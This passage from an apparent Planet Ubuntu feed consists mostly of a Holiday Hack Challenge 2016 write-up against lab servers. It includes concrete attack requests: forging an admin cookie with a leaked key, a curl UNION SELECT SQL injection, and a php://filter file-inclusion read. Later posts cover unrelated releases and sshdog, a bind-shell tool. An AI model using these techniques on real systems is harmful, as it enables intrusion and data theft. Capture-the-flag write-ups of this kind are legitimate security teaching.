35.184.63.245
35.184.47.139
104.154.196.33

Taking each of these IPs to our trusty Tom Hessman, we find that each of them is in scope for our testing, but we are advised to keep our traffic reasonable.

analytics.northpolewonderland.com

I started by doing a quick NMAP scan of the host – it’s good to know what’s running on a machine, and sometimes you can reveal some interesting info with the default set of scripts. In fact, that turned out to be extremely handy in this particular case:

% nmap -F -sC analytics.northpolewonderland.com

Starting Nmap 7.31 ( https://nmap.org )
Nmap scan report for analytics.northpolewonderland.com (104.198.252.157)
Host is up (0.065s latency).
rDNS record for 104.198.252.157: 157.252.198.104.bc.googleusercontent.com
Not shown: 98 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey:
|   1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA)
|   2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA)
|_  256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA)
443/tcp open  https
| http-git:
|   104.198.252.157:443/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Finishing touches (style, css, etc)
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
| ssl-cert: Subject: commonName=analytics.northpolewonderland.com
| Subject Alternative Name: DNS:analytics.northpolewonderland.com
| Not valid before: 2016-12-07T17:35:00
|_Not valid after:  2017-03-07T17:35:00
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_  http/1.1

You’ll notice that the nmap http-git script was successful in this case. This is a not-uncommon finding when developers use git to deploy an application directly to the document root (very common in the case of PHP applications, which is likely the case here due to the redirect to ‘login.php’). This is great, because we can download the entire git repository, which will allow us to look for secrets, credentials, hidden handlers, or at least better understand the application.

Now, it’s not possible to clone this directly over HTTP because nobody ran git update-server-info – they weren’t intending to share the repository over the network. But that’s okay: with directory indexing enabled, we can just mirror all the files with wget, then clone a working repository from the copy:

% wget --mirror https://analytics.northpolewonderland.com/.git
…
Downloaded: 314 files, 1003K in 0.4s (2.68 MB/s)
% git clone analytics.northpolewonderland.com/.git analytics
Cloning into 'analytics'...
done.
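Why does mirroring raw files work? A .git directory is entirely self-contained: copy it anywhere and git can clone a full working tree (with history) from it. A minimal local reproduction of the trick – all paths and file contents here are throwaway stand-ins:

```shell
set -e
demo=$(mktemp -d)

# Stand-in for the deployed web root
git init -q "$demo/site"
echo '<?php echo "login"; ?>' > "$demo/site/login.php"
git -C "$demo/site" add -A
git -C "$demo/site" -c user.name=dev -c user.email=dev@example.com \
    commit -qm 'Finishing touches'

# An exposed .git is just static files; cp stands in for `wget --mirror`
cp -r "$demo/site/.git" "$demo/stolen.git"

# Clone from the mirrored metadata to recover source and history
git clone -q "$demo/stolen.git" "$demo/analytics"
cat "$demo/analytics/login.php"
```

The clone recovers not just the deployed files but every commit, which is exactly what makes this finding so valuable for secret hunting.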

Looking at the source, we find a few interesting files (given that we know an audio file is at least one of our goals): there’s a getaudio.php that returns a download of an mp3 file from the database (storing the whole MP3 in a database column isn’t the design choice I would have made, but I suppose I’ll be discovering a lot of design choices I wouldn’t have made). It’s noteworthy that the only user it will allow to download a file is the user guest. I decided to try logging in with the credentials we found in the app earlier (guest:busyreindeer78), and was straight in. Conveniently, the top of the page has a link labeled “MP3”, and a click later we have discombobulatedaudio2.mp3.

That was easy, but I have reason to believe we’re not done here – if for no reason other than the fact that there are 2 references to the analytics server in the challenge description. There’s also quite a bit of functionality we haven’t tried out yet. I spent a few minutes reviewing the SQL queries in the application. They’re not parameterized queries (again, differing design decisions) but the liberal use of mysqli_real_escape_string seems to prevent any obvious SQL injection.

One notable feature is the ability to save analytics reports. It’s *particularly* notable that the way in which they are saved is by storing the final SQL query into a column in the reports table. There’s also an ‘edit’ function for these saved queries, which seems to be designed just for renaming the saved reports, but if we look at the code, we easily see that we can edit any column stored in the database, including the stored SQL query. I’m honestly not sure what the right term is for this vulnerability (SQL injection implies injecting into an existing query, after all), but it’s clearly a vulnerability that will let us read arbitrary data from the database – including the stored MP3s, assuming we can access the edit functionality.

Code allowing any column to be updated:

$row = mysqli_fetch_assoc($result);

# Update the row with the new values
$set = [];
foreach($row as $name => $value) {
    print "Checking for " . htmlentities($name) . "...<br>";
    if(isset($_GET[$name])) {
        print 'Yup!<br>';
        $set[] = "$name='".mysqli_real_escape_string($db, $_GET[$name])."'";
    }
}

This edit function is allegedly restricted to not allow any users access:

(edit.php)

# Don't allow anybody to access this page (yet!)
restrict_page_to_users($db, []);

However, if we investigate the restrict_page_to_users function, we find that it calls check_access from db.php, which contains this code:

(db.php)

function check_access($db, $username, $users) {
    # Allow administrator to access any page
    if($username == 'administrator') {
        return;
    }

We now know that there’s probably an “administrator” user and that getting to that will allow us to access the edit.php page. Unfortunately, we don’t have credentials to log in as administrator, and we can’t use our arbitrary SQL to read the credentials until we have access. Stuck in a Catch-22? Not quite: who said we have to log in?

Earlier I foreshadowed the value of having access to the git repository for the site: session cookies are encrypted with symmetric crypto, and the key is available in the git repository:

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

This allows us to encrypt our own session cookie as administrator. I hacked together a short script to create a new AUTH cookie:

<?php
include('crypto.php');
print encrypt(json_encode([
    'username' => 'administrator',
    'date' => date(DateTime::ISO8601),
]));

Using my favorite cookie-editing extension to update my cookie, I quickly discover that the edit functionality is now available. Now, the edit page doesn’t provide an input field for the query, but thanks to Burp Suite, it’s easy enough to add my own parameter and edit the query. Based on getaudio.php, I know the schema for the audio table, so I craft a query to get it. Lacking an easy way to return the binary data directly (I can only execute this query within the context of an HTML page), I decide to return the MP3 encoded as a string. Base64 would probably be ideal to minimize overhead, but the TO_BASE64 function was only added in MySQL 5.6 and I was too lazy to query the version from the database, so I encoded as hex instead.

I wanted the following query: SELECT `id`,`username`,`filename`,hex(`mp3`) FROM audio, so I POST’d to the following URL:

https://analytics.northpolewonderland.com/edit.php?id=1147b606-4d2f-4faa-b771-a55e03307367&name=foo&description=bar&query=SELECT+`id`,`username`,`filename`,hex(`mp3`)+FROM+audio

Then I ran the report with the saved report functionality, extracted the hex, and decoded it to reveal the other MP3 file. Based on the filename stored in the report, I saved it to my audio directory with the name discombobulatedaudio7.mp3. From the query results, we know these are the only 2 MP3s in the audio table, so it seems like it’s time to move on to the next server, but I decided to grab the passwords from the users table by updating the query again, just in case they might be useful later.
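Turning the hex column back into a playable file is a one-liner. A sketch of the decode step – the byte string here is just the three-byte "ID3" header that tagged MP3 files begin with, not the real response data:

```shell
# xxd -r -p reverses a plain (continuous) hex dump back into raw bytes
printf '494433' | xxd -r -p > /tmp/recovered.mp3
head -c 3 /tmp/recovered.mp3   # → ID3
```

Hex doubles the size of the payload versus base64's roughly 33% overhead – one more reason TO_BASE64 would have been the nicer choice had it been available.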

Addendum: An Unintentional Vulnerability

After finishing all of the challenges, I happened to be looking back at this one when I discovered a 2nd vulnerability, which I suspect was not intended as part of the challenge. If you notice the file query.php does a number of input validation checks, each looking something like this:

if(!ctype_alpha($field)) {
    reply(400, "Field name can only contain letters!");
    die();
}

You’ll notice the reply function sets the HTTP status code and prints a message, then the script dies to prevent further execution. However, if you look further down (line 178), you’ll discover this check and query construction:

$type = $_REQUEST['type'];
if($type !== 'launch' && $type !== 'usage') {
    reply(400, "Type has to be either 'launch' or 'usage'!");
}

$query = "SELECT * ";
$query .= "FROM `app_" . $type . "_reports` ";
$query .= "WHERE " . join(' AND ', $where) . " ";
$query .= "LIMIT 0, 100";

Though it appears the author intended to limit type to the strings ‘launch’ and ‘usage’, the lack of a call to die() in the error handler results in the query being executed and results returned anyway! So we can inject into the type field and steal the mp3 files using a UNION SELECT SQL injection:
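The bug is pure control flow, independent of SQL. A shell analog of the same mistake – function and variable names here are mine, not from query.php:

```shell
# reply() mirrors the PHP helper: it reports an error but does NOT exit
reply() { echo "HTTP $1: $2"; }

build_query() {
  local type=$1
  if [ "$type" != "launch" ] && [ "$type" != "usage" ]; then
    reply 400 "Type has to be either 'launch' or 'usage'!"
    # missing 'return 1' (the PHP was missing die()) -- we fall through
  fi
  echo "SELECT * FROM \`app_${type}_reports\` LIMIT 0, 100"
}

# The "validation" fires, yet the attacker-controlled value still
# reaches the query:
build_query 'evil'
```

Running it prints the 400 error and then builds the query with the bad value anyway – exactly the behavior the curl exploit relies on.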

curl 'https://analytics.northpolewonderland.com/query.php' \
    -H 'Cookie: AUTH=82532b2136348aaa1fa7dd2243dc0dc1e10948231f339e5edd5770daf9eef18a4384f6e7bca04d87e572ba65ce9b6548b3494b6063a30265b71c76884152' \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    --data 'date=2017-01-05&type=usage_reports` LIMIT 0 UNION SELECT id,username,filename,to_base64(mp3),NULL from audio -- '

ads.northpolewonderland.com

The nmap results for this host were rather unremarkable: essentially, yes, it’s a webserver. Visiting the full URL from the APK, the site directly returns an image file (no link? I guess these banner ads are for brick-and-mortar stores). Navigating to the root, we find the administration site for the ad system.

Fortunately, I had happened upon a helpful elf who informed me about this “Meteor” javascript framework, and the MeteorMiner script for extracting information from Meteor. Unfortunately, I had never seen Meteor before, so I had no idea what was going on. After trying some braindead attempts to steal the credentials for an administrator (Meteor.users.find().fetch() returned nothing), I attempted to register a new account to see if I could get access to more interesting functionality that way, but was repeatedly rebuffed by the site:

I began to look into how Meteor manages users, and guessed that they were using the default user management package. According to the documentation, you could add users for testing by calling the createUser method:

Accounts.createUser({password:'matirwuzhere', username:'matir'})

It turns out that this worked to create a user, and even directly logged me in as that user. Unfortunately, all of the pages still gave me a response of “You must be logged in to access this page”. I clicked around and generated dozens of requests and didn’t realize anything had meaningfully changed until I noticed that MeteorMiner was reporting a 5th member of the HomeQuote collection. Examining the collection in the javascript console revealed my prize: the path to an audio file, discombobulatedaudio5.mp3:

dev.northpolewonderland.com

Nmap gets us nothing here: just HTTP and SSH open. Visiting the webserver, we find nothing, literally: just a “200 OK” response with no content. I can’t run dirbuster (thanks Tom!), so how can I figure out what the web application might be doing?

Well, I have essentially two options: I can analyze the SantaGram APK, maybe using dex2jar and JAD (or another Java decompiler) to get semi-readable source, or I can run the APK in an emulator and capture requests with Burp Suite. For several reasons – not least that I spend a lot of time in Burp during my day-to-day work – I decide to go with the second route, so I’ll be using the tools I’m most familiar with.

So I fire up the Android emulator with the proxy set to my Burp instance, install SantaGram with adb, and start playing with the app. It turns out this is another place that we can use the guest:busyreindeer78 credentials to log in, but no matter what I do in the app, I can’t seem to see any requests for dev.northpolewonderland.com. Looking at res/values/strings.xml from the APK, I see an important entry adjacent to the dev.northpolewonderland.com entry:

<string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
<string name="debug_data_enabled">false</string>

Well, I suppose it’s not sending requests to dev because debug_data_enabled is false. Let’s change that to true and rebuild the APK:

% apktool b -o santagram_mod.apk santagram
% /tmp/apk-resigner/signapk.sh ./santagram_mod.apk
% adb install santagram_mod.apk
% adb uninstall com.northpolewonderland.santagram
% adb install signed_santagram_mod.apk

It turns out rebuilding the APK was more troublesome than I anticipated because it needed to be resigned, and then the resigned one couldn’t be installed because it used a different key than the existing one, so I needed to uninstall the HHC SantaGram and install mine. (Clearly I need to do more mobile assessments.)

With the debug-enabled version installed, it was time to play with the app some more. While debugging the lack of debug requests, I noticed several references to the debug code in the user profile editing class, so I decided to give that a try and noticed (finally!) requests to dev.northpolewonderland.com.

POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: dev.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 144

{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400}

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 30 Dec 2016 20:09:37 GMT
Content-Type: application/json
Connection: close
Content-Length: 250

{"date":"20161230200937","status":"OK","filename":"debug-20161230200937-0.txt","request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":false}}

I noticed that the entire request is included in the response, plus a new field is added to the JSON: "verbose":false. Can we include that in the request, and maybe switch it to true? I send the request to Burp Repeater and add the verbose field, set to true:

POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: dev.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 159

{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true}

Unsurprisingly, the response changes, but we get far more than just details about our own debug message!

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 30 Dec 2016 23:01:56 GMT
Content-Type: application/json
Connection: close
Content-Length: 465

{"date":"20161230230156","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161230230156-0.txt","filename.len":26,"request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true},"files":["debug-20161224235959-0.mp3","debug-20161230224818-0.txt","debug-20161230225810-0.txt","debug-20161230230155-0.txt","debug-20161230230156-0.txt","index.php"]}

You’ll notice we got a listing of all the files in the current directory (they must be cleaning that up periodically!), including an mp3 file. Could this be the next discombobulatedaudioN.mp3? I download the file and get something of approximately the right size, but it’s not clear which of the discombobulated files it will be. All of the others had a filename in the discombobulated format (at least nearby, if not directly) so I set this one aside to be renamed later.

dungeon.northpolewonderland.com

Initial nmap results for dungeon.northpolewonderland.com weren’t revealing anything too interesting. Visiting the webserver, I found what appears to be the help documentation for a Zork-style dungeon game. I remembered one of the elves offering up a copy of a game from a long time ago, so I went back and downloaded it.

I started playing the game briefly but, for as much as I love RPGs (I used to run several MUDs back in the 90s), I was impatient and wanted to get on with the Holiday Hack Challenge. I started with the obvious: running strings on both the binary and the data file, but that gave very little headway. I looked at Zork data file editors, but the first couple I found couldn’t decompile the provided data file (whether by accident, by design of the challenge, or because I picked the wrong tools, I have no idea).

However, on one of the sites where I was reading about reversing Zork games, I discovered a mention of a built-in debugger called GDT, the Game Debugger Tool. Among other things, GDT lets you dump all the information about NPCs, strings in the game, etc. Much as I would use GNU strings to get oriented in an unknown binary, I decided to use the GDT string dump to find all of the in-game strings. Unfortunately, GDT requires a string index and dumps one entry at a time. Not knowing how many strings there were, I picked 2048 as a starting point and wrote a little inline shell script to dump them. I discovered that it starts to crash after about 1279, and the last handful seemed to be garbage (ok, no bounds checking – I wonder what else I could do?), so I adjusted my 2048 to 1200 and tried again:

for i in $(seq 1 1200); do
  echo -n "$i: "
  echo -e "GDT\nDT\n$i\nEX\nquit\ny" | \
    ./dungeon 2>/dev/null | \
    tail -n +5 | \
    head -n -3
done

This produced a surprisingly readable strings table, except for some garbage at the end. (It appears the correct number of strings is 1027 for this particular game file.) At a quick glance, I noticed some references to an “elf” near the end, while the rest of them seemed like pretty standard Zork gameplay. Most interesting was this line:

1024: >GDT>Entry:
The elf, satisified with the trade says - Try the online version for the true prize

Well great, I need to find an online version, but I didn’t find a clue as to where it would be from the webpage with instructions, nor did the rest of the strings in the offline version offer a hint. When in doubt – more recon! Time for a full NMAP scan (but I’ll leave scripts off in the interest of time):

Starting Nmap 7.31 ( https://nmap.org )
Nmap scan report for dungeon.northpolewonderland.com (35.184.47.139)
Host is up (0.066s latency).
rDNS record for 35.184.47.139: 139.47.184.35.bc.googleusercontent.com
Not shown: 64989 closed ports, 543 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
11111/tcp open  vce

Nmap done: 1 IP address (1 host up) scanned in 46.16 seconds

Aha! Port 11111 is open. I imagine netcat will give us an instance of the dungeon game. My first question is whether the “Try the online version for the true prize” string says something different:

% nc dungeon.northpolewonderland.com 11111
Welcome to Dungeon.  This version created 11-MAR-78.
You are in an open field west of a big white house
with a boarded front door.
There is a small wrapped mailbox here.
>GDT
GDT>DT
Entry: 1024
The elf, satisified with the trade says -
send email to "peppermint@northpolewonderland.com" for that which you seek.

That was surprisingly easy – I really expected to need to do more. Maybe it’s misleading? I send an email off to Peppermint and wait with anticipation for Santa’s elves to do their work.

It turns out it really was that easy! Moments later, I have an email from Peppermint with an attachment: it’s discombobulatedaudio3.mp3!

ex.northpolewonderland.com

One last server to go! This server is apparently for handling uncaught exceptions from the application. To figure out what kind of traffic it’s seeing, I decided to try to trigger an exception in the application running in the emulator (still going from my work on dev.northpolewonderland.com). I actually stumbled upon this by mistake: if you change the device to be emulated to a Nexus 6, the application crashes and sends a crash report to ex.northpolewonderland.com.

POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 3860

{"operation":"WriteCrashDump","data":{...}}

I’ve omitted the contents of “data” in the interest of space, but it mostly contained the traceback of the exception that was thrown. Interestingly, the response indicates that crashdumps are stored with a PHP extension, so my first thought was to try to include PHP code in the backtrace, but that never worked out (the code wasn’t being executed). I’m assuming the PHP interpreter wasn’t turned on for that directory.

HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 81

{
    "success" : true,
    "folder" : "docs",
    "crashdump" : "crashdump-QKMuKk.php"
}

It turns out there’s also a ReadCrashDump operation that you can provide a crashdump name and it will return the contents. You omit the php extension when sending the request, like so:

POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 69

{"operation":"ReadCrashDump","data":{"crashdump":"crashdump-QKMuKk"}}

Given that I confirmed the crashdumps are in a folder “docs” relative to exception.php, I tried reading the “crashdump” ../exception to see if I could view the source, but that gives a 500 Internal Server Error. (Likely it keeps loading itself in an include() loop.) PHP, however, provides some creative ways to read data, filtering it inline. These pseudo-URLs for file opening result in different encodings and can be quite useful for bypassing LFI filters, non-printable characters for extracting binaries, etc. I chose to use one that encodes a file as base64 to see if I could get the source of exception.php:

POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 109

{"operation":"ReadCrashDump","data":{"crashdump":"php://filter/convert.base64-encode/resource=../exception"}}

HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Sat, 31 Dec 2016 00:56:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3168

PD9waHAgCgojIEF1ZGlvIGZpbGUgZnJvbSBEaXNjb21ib2J1bGF0b3IgaW4gd2Vicm9vdDog
…
oZHVtcFsnY3Jhc2hkdW1wJ10gLiAnLnBocCcpOwoJfQkKfQoKPz4K
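Decoding is a one-liner; as a sanity check, the first few characters of the response body already decode to the start of a PHP file:

```shell
# The first chunk of the filtered response, decoded on its own
printf 'PD9waHAgCgojIEF1ZGlvIGZpbGU=' | base64 -d
```

This prints the opening `<?php` line and the start of the comment, confirming we are looking at base64-encoded source rather than noise.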

The base64 encoded output is a great sign. I decode it to discover, as expected, the contents of exception.php, which starts with this helpful hint:

<?php
# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

So, there we have our final piece of the discombobulated audio: discombobulatedaudio6.mp3. This particular LFI was interesting for a few reasons: the use of chdir() to change directory instead of prepending the directory name, and the requirement that the file ends in .php. Had they prepended the directory name, a filter could not have been used because the filter must be at the beginning of the string passed to the PHP file open functions (like require, include, fopen).

Part 5: Discombobulated Audio

Fixing the Audio

We now have 7 audio files. Listening to each one, you don’t hear much, but the overall tone suggests to me that the audio has been slowed down somewhat. So I open up Audacity and put all the files into one project. Then I use “Tracks > Align Tracks > Align End to End” to place the tracks in a series, so the resulting audio plays end to end.

I wasn’t sure if numerical order would be the right order, but the amplitude of the end of each piece looked similar to the amplitude of the beginning of the next piece and playing the audio sounded rather continuous, but still unintelligible, so I decided to proceed. (I was hoping nobody was going to make me try all 5040 permutations of audio!) I merged the tracks together (via Tracks > Mix and Render) and then changed the tempo (via Effects > Change Tempo) by about 600%. It still didn’t sound quite right, but was close enough that I could make out the message:

“Merry Christmas, Santa Claus, or as I have always known him, Jeff”

It wasn’t clear to me what to do with the audio, or how this would help to find the kidnapper, but since there’s still one door that I didn’t have the password to (the corridor behind Santa’s office), I decided to try and see if this helped with getting past the door.

Santa’s Kidnapper

I was honestly a little surprised when the “Nice” light flashed and I was past the last locked door! As soon as I was through, I was in a small dark room with a ladder going up. I actually hesitated to click up the ladder, because part of me didn’t want the game to be over. But without anything else to do in the game (except collect NetWars coins… that took a little extra time) I clicked up the ladder, expecting a nefarious villain, and finding…. Dr. Who?

But why, Dr. Who, why? I can’t, for the life of me, imagine a reason to kidnap Santa Claus and take him back to 1978.

As told in his own words:

<Dr. Who> - I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. People were happy there. It's a better life, I tell you, a better world than the scarred one we endure here.

Well, actually, I think I have to agree with the Doctor: the world would be a much better place without the Star Wars Holiday Special. But the ends do not justify the means. In any case, Santa was returned in time to complete his Christmas rounds and deliver the toys via portal to all the white hat boys and girls of the world. (And perhaps a few of the grey hats too…)

Kubuntu General News: Plasma 5.8.5 bugfix release in Xenial and Yakkety Backports now

Planet Ubuntu - Thu, 01/05/2017 - 00:57

Plasma 5.8.5 brings bug-fixes and translations from the month of December, thanks to the hard work of the Plasma team and the KDE Translation team.

To update, use the Software Repository Guide to add the following repository to your software sources list:

ppa:kubuntu-ppa/backports

Instructions on how to manage PPAs and more info about the Kubuntu PPAs can be found in the Repositories Documentation

Seif Lotfy: Hot Functions for IronFunctions

Planet Ubuntu - Wed, 01/04/2017 - 13:50

For every request, IronFunctions would spin up a new container to handle the job, which, depending on the container and task, could add a couple hundred milliseconds of overhead.

So why not reuse the containers if possible? Well that is exactly what Hot Functions do.

Hot Functions improve IronFunctions throughput by 8x (depending on duration of task).

Hot Functions reside in long-lived containers dedicated to one type of task; incoming workloads are fed to the container's standard input, and results are read from its standard output. In addition, permanent network connections are reused.

Here is what a hot function looks like. Currently, IronFunctions implements an HTTP-like protocol to operate hot containers, but instead of communicating over a TCP/IP port, it uses standard input/output.
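The idea is easy to sketch in a few lines of shell – a toy stand-in for illustration, not the actual IronFunctions protocol: one long-lived worker answers a stream of requests over stdin/stdout, paying its startup cost only once.

```shell
# A "hot" worker: launched once, then serves every request on its stdin
hot_worker() {
  while IFS= read -r request; do
    echo "Hello ${request}!"   # one response line per request line
  done
}

# Three "requests" handled by a single worker invocation
printf 'World\nIron\nFunctions\n' | hot_worker
```

A cold setup would pay the process (or container) launch cost for each of those three requests; here it is paid once for the whole stream, which is where the throughput multipliers below come from.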

So to test this baby we deployed on 1 GB Digital Ocean instances (which is not much), and used Honeycomb to track and plot the performance.

Simple function printing "Hello World" called for 10s (MAX CONCURRENCY = 1).

Hot Functions have 162x higher throughput.

Complex function pulling an image and md5 checksumming, called for 10s (MAX CONCURRENCY = 1).

Hot Functions have 1.39x higher throughput.

By combining Hot Functions with concurrency we saw even better results:

Complex function pulling image and md5 checksumming called for 10s (MAX CONCURRENCY = 7)

Hot Functions have 7.84x higher throughput.

So there you have it, pure awesomeness by the Iron.io team in the making.

Also a big thank you to the good people at Honeycomb for their awesome product, which allowed us to benchmark and plot (all the screenshots in this article are from Honeycomb). It's a great and fast new tool for debugging complex systems, combining the speed and simplicity of time-series metrics with the raw accuracy and context of log aggregators.

Since it supports answering arbitrary, ad-hoc questions about those systems in real time, it was an awesome, flexible, powerful way for us to test IronFunctions!

Raphaël Hertzog: My Free Software Activities in December 2016

Planet Ubuntu - Wed, 01/04/2017 - 02:48

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donors (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

Debian LTS

I was allocated 10 hours to work on security updates for Debian 7 Wheezy. During this time I did the following:

  • I released DLA-741-1 on unzip. This was an easy update.
  • I reviewed Roberto Sanchez’s patch for CVE-2014-9911 in ICU.
  • I released DLA-759-1 on nss in collaboration with Antoine Beaupré. I merged and updated Guido’s work to enable the testsuite during build and to add DEP-8 tests.
  • I created a git repository for php5 maintenance in Debian LTS and started to work on an update. I added patches for two CVEs (CVE-2016-3141, CVE-2016-2554) and added some binary files required by (currently failing) tests.
Misc packaging

With the strong freeze approaching, I had some customer requests to push packages into Debian and/or to fix packages that were in danger of being removed from stretch.

While trying to bring back uwsgi into testing I filed #847095 (libmongoclient-dev: Should not conflict with transitional mongodb-dev) and #847207 (uwsgi: FTBFS on multiple architectures with undefined references to uwsgi_* symbols) and interacted on some of the RC bugs that were keeping the package out of testing.

I also worked on a few new packages (lua-trink-cjson, lua-inotify, lua-sandbox-extensions) that enhance hindsight in some use cases and sponsored a rozofs update in experimental to fix a file conflict with inn2 (#846571).

Misc Debian work

Debian Live. I released two live-build updates. The second update added more options to customize the grub configuration (we use it in Kali to override the theme and add more menu entries) both for EFI boot and normal boot.

Misc bugreports. #846569 on libsnmp-dev to accommodate the libssl transition (I noticed the package was not maintained and asked for new maintainers on debian-devel). #847168 on devscripts for debuild, which started failing when lintian was failing (an unexpected regression). #847318 on lintian to not emit spurious errors for Kali packages (which was annoying with the debuild regression above). #847436 for an upgrade problem I got with tryton-server. #847223 on firefoxdriver, as it was still depending on iceweasel instead of firefox.

Sponsorship. I sponsored a new version of asciidoc (#831965) and of ssldump 0.9b3-6 (for libssl transition). I also uploaded a new version of mutter to fix #846898 (it was ready in SVN already).

Distro Tracker

Not much happening; I fixed #814315 by switching a few remaining URLs to https. I merged patches from efkin to fix the functional test suite (#814315), which was a really useful contribution! The same contributor started to tackle another ticket (#824912) about adding an API to retrieve action items. This is a larger project and needs some thought. I still have to respond to his latest patches (after two rounds already).

Misc stuff

I updated the letsencrypt-sh salt formula for version 0.3.0 and added the possibility to customize the hook script to reload the webserver.

The @planetdebian Twitter account has not been working since twitterfeed.com closed its doors, and the replacement (dlvr.it) is unhappy about the RSS feed of planet.debian.org. I filed bug #848123 against planet-venus since it does not preserve the isPermalink attribute in the guid tag.

Thanks

See you next month for a new summary of my activities.


David Tomaschik: New Tool: sshdog

Planet Ubuntu - Wed, 01/04/2017 - 01:00

I recently needed an encrypted, authenticated remote bind shell due to a situation where, believe it or not, the egress policies were stricter than ingress! Ideally I could forward traffic and copy files over the link.
I was looking for a good tool and casually asked my coworkers if they had any ideas when one said “sounds like SSH.”

Well, shit. That does sound like SSH and I didn’t even realize it. (Tunnel vision, and the value of bouncing ideas off of others.) But I had a few more requirements in total:

  • Encrypted
  • Authenticated
  • Bind (not reverse)
  • Windows & Linux
  • No Admin/Installation required
  • Can be shipped preconfigured
  • No special runtime requirements

At this point, I began hunting for SSH servers that fit the bill, but found none. So I began to think about Paramiko, the SSH library for Python, but then I’d still need the Python runtime (though there are ways to build a binary out of a python script). I then recalled once seeing that Go has an ssh package. I looked at it, hoping it would be as straightforward as Paramiko (which can become a full SSH server or client in about 10 lines), but it’s not quite so. With the Go package, all of the crypto is handled for you, but you need to handle the incoming channels and requests yourself. Fortunately, the package provides code for marshaling and unmarshaling messages from the SSH wire format.
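That wire-format marshaling is worth a quick look. An SSH "string" (RFC 4251, which the Go ssh package marshals for you) is just a big-endian uint32 length prefix followed by the raw bytes. Here is a rough stdlib-Python illustration of the encoding (not sshdog's actual code, which is Go):

```python
import struct

def ssh_string(data: bytes) -> bytes:
    # RFC 4251 "string": 4-byte big-endian length, then the bytes themselves.
    return struct.pack(">I", len(data)) + data

def parse_ssh_string(buf: bytes):
    # Inverse of ssh_string(): returns (value, remaining bytes).
    (n,) = struct.unpack(">I", buf[:4])
    return buf[4:4 + n], buf[4 + n:]
```

Channel-open and request messages on the wire are built out of primitives like this (strings, uint32s, booleans), which is exactly what the Go package's marshaling and unmarshaling helpers hide from you.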

I decided that I would get better performance and more predictable behavior without needing to package the Python runtime, plus I appreciated the stability Go would provide (fewer runtime errors), so I began developing. What I ended up with is sshdog, and I'm releasing it today.

sshdog supports:

  • Windows & Linux
  • Configure port, host key, authorized keys
  • Pubkey authentication (no passwords)
  • Port forwarding
  • SCP (but no SFTP support)

Additionally, it’s capable of being installed as a service on Windows, and daemonizing on Linux. It uses go.rice to embed configuration within the resulting binary and give you a single executable that runs the server.

Example Usage

% go build .
% ssh-keygen -t rsa -b 2048 -N '' -f config/ssh_host_rsa_key
% echo 2222 > config/port
% cp ~/.ssh/id_rsa.pub config/authorized_keys
% rice append --exec sshdog
% ./sshdog
[DEBUG] Adding hostkey file: ssh_host_rsa_key
[DEBUG] Adding authorized_keys.
[DEBUG] Listening on :2222
[DEBUG] Waiting for shutdown.
[DEBUG] select...

Why sshdog?

The name is supposed to be a riff off netcat and similar tools, as well as an anagram for “Go SSHD”.

Please give it a try, and feel free to file bugs/pull requests on the GitHub project: https://github.com/Matir/sshdog.

Dustin Kirkland: My 2017 New Years Resolution...

Planet Ubuntu - Tue, 01/03/2017 - 15:36

What's yours?

Happy 2017!
:-Dustin

Ubuntu Weekly Newsletter Issue 493

The Fridge - Tue, 01/03/2017 - 09:20

